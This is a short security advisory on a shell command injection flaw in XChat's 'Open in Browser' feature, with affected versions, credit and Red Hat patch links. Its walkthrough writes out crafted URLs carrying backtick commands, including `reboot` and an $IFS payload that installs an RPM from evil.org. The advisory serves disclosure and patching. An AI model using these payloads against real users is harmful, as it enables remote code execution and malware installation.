|
|
|
|
| |
| XChat allows users to right-click on a URL that appears in an IRC discussion and select "Open in Browser." To open the URL in a browser, XChat passes it to /bin/sh. So, a malicious URL could execute arbitrary shell commands as the user running XChat. A patch for RedHat systems changes XChat to bypass the shell and execute the browser directly. |
| |
Credit:
The information has been provided by zenith parsec.
|
| |
Vulnerable systems:
Version prior to XChat 1.4.0
Immune systems:
XChat 1.4.0
Hack walkthrough:
Imagine that someone types in an IRC channel:
l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'
With the 'Existing' or 'New Window' options. If others use 'openURL(%s)' type commands to start the program, you get:
netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'
Count the appearance of character ' and you will see that at the 2nd `date` they are closed, and then reopened, so that `date` isn't escaped anymore - leaving it free to run, which it does.
With the 'Run New' type commands (that is, command %s with no 's around the %s) you get:
netscape http://www.altavista.com/?x=`date`y='`date`'
Which has the 1st `date` unescaped (no 's around it) and so it executes. In real life though, its unlikely anyone would click on a URL like
http://`reboot`/'`reboot`'
But URLs can get pretty long. For example, a cgi-bin call to something can get quite long:
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10
Compare that to:
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1
An attacker can even build full commands, using $IFS (assuming it's defined) for spaces (since spaces cannot be included in the URL):
http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'
Patch:
Red Hat Linux 6.2:
sparc:
ftp://updates.redhat.com/6.2/sparc/xchat-1.4.0-2.sparc.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/xchat-1.4.0-2.alpha.rpm
i386:
ftp://updates.redhat.com/6.2/i386/xchat-1.4.0-2.i386.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/xchat-1.4.0-2.src.rpm
|
|
|
|
|
|
|
|
|
|
